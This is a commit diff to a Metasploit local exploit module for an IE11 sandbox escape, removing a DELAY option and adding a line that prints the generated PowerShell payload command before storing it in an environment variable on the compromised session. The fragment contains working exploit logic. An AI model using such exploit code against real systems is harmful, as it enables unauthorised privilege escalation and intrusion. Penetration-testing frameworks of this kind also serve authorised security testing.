Do test
parent
05ed2340dc
commit
b8a2cf776b
Binary file not shown.
|
@ -64,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -156,6 +151,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_good(".NET looks vulnerable, exploiting...")
|
||||
|
||||
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
|
||||
print_status cmd
|
||||
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
|
||||
|
||||
temp = get_env('TEMP')
|
||||
|
|
Loading…
Reference in New Issue